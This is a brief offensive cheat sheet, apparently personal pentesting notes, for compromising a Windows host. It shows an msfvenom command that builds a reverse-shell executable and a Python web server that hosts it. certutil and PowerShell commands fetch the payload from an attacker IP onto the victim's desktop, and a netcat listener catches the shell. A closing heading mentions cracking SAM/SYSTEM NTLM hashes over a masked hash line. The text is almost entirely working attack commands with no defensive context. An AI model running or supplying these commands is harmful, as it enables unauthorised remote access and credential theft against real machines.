Generate a reverse shell executable (reverse.exe) using msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe -o reverse.exe

Connect to the server:

python3 -m http.server
certutil -urlcache -f -split http://[IP]:[PORT]/reverse.exe
'powershell InvokeWebRequest \
    -URI http://[IP]:[PORT]/payload.exe -o C:\Users\username\Desktop\payload.exe'
netcat -nvlp 1453

Crack the SAM & SYSTEM | NT:NTLM Files:

NTLM Hash: username:****:********************************:********************************:::